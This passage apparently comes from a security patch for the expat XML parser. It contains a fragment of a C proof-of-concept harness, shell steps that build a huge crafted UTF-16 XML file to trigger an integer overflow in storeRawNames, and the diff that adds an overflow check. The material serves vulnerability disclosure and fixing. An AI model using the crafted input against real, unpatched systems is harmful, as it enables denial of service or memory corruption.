err(1, "failed to allocate buffer");
}
i = 0;
while (fread(buf, CHUNK, 1, fp) == 1) {
printf("iteration %d: XML_Parse returns %d\n", ++i,
XML_Parse(parser, buf, CHUNK, XML_FALSE));
}
free(buf);
fclose(fp);
XML_ParserFree(parser);
return 0;
}
EOF
gcc -fsanitize=address -o poc poc.c -lexpat
```
3. Construct specially prepared UTF-16 XML file:
```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```
4. Run proof of concept:
```
./poc poc-utf16.xml
```
---
expat/lib/xmlparse.c | 7 ++++++-
1 file changed, 6 insertions(+), 1 deletion(-)
--- a/lib/xmlparse.c
+++ b/lib/xmlparse.c
@@ -2424,6 +2424,7 @@ storeRawNames(XML_Parser parser) {
while (tag) {
int bufSize;
int nameLen = sizeof(XML_Char) * (tag->name.strLen + 1);
+ size_t rawNameLen;
char *rawNameBuf = tag->buf + nameLen;
/* Stop if already stored. Since m_tagStack is a stack, we can stop
at the first entry that has already been copied; everything
@@ -2435,7 +2436,11 @@ storeRawNames(XML_Parser parser) {
/* For re-use purposes we need to ensure that the
size of tag->buf is a multiple of sizeof(XML_Char).
*/
- bufSize = nameLen + ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ rawNameLen = ROUND_UP(tag->rawNameLength, sizeof(XML_Char));
+ /* Detect and prevent integer overflow. */
+ if (rawNameLen > (size_t)INT_MAX - nameLen)
+ return XML_FALSE;
+ bufSize = nameLen + (int)rawNameLen;
if (bufSize > tag->bufEnd - tag->buf) {
char *temp = (char *)REALLOC(parser, tag->buf, bufSize);
if (temp == NULL)